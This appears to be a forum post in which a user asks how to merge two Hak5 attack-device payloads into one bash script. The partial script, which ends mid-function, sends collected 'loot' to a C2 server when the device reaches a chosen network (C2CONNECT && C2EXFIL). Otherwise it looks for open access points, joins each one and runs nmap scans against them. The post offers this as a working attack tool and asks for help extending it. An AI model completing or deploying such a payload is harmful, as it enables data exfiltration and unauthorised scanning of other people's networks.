Payload Advice Needed

JAL21

ok, so I'm new to this, but if I want to combine a couple of the payloads that's available at hak5 GitHub, can I for example make one payload that has wifi connect payload and the open ap Nmap 

my thought was to copy the payloads into a single payload and make the individual payload a function! Any tips or tricks would be nice! 

My goal is that if it connects to a specific network when it boots up, it will dump the loot to C2, but if it doesn't connect, it will automatically start the Open AP Nmap Scan

this is what I have so far:

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

#!/bin/bash

# This is a test to see if my network is in range, it will connect home and export the loot to C2 
# if my network is out of range or can't connect to it, it will do the Open AP Attack!

# Title: Simple WiFi Connection Example

# Author: Hak5Darren
# Version: 1.0

function Home() {
# WiFi Client Setup
WIFI_SSID="SSID"
WIFI_PASS="Password"

LED SETUP
WIFI_CONNECT
# optionally start SSH server
# /etc/init.d/sshd start
LED ATTACK
C2CONNECT && C2EXFIL
}

function OpenAP() {
# Title: Open AP Nmap Scanner
# Author: Hak5Darren
# Version: 1.0
#
# Description: Scans for open access points, then connects to each and runs an Nmap scan saving logs to the loot folder
#
# LED SETUP: Scanning
# LED ATTACK: Connected, running nmap scan
#
# See nmap --help for options. Default "-sP" ping scans the address space for fast host discovery.

NMAP_OPTIONS="-sP"
LOOT_DIR=/root/loot/open_ap_nmap_scan
MAX_CIDR=20
DEBUG=1

function scan_wifi() {
    [[ $DEBUG == 1 ]] && echo Scanning for open access points | tee -a /tmp/payload.log
    iwlist wlan0 scan > /tmp/wifi_scan
    cat /tmp/wifi_scan | grep "Encryption key:off" -A1 | grep ESSID | sort | uniq | cut -c 28- | sed "s/.$//g" > /tmp/open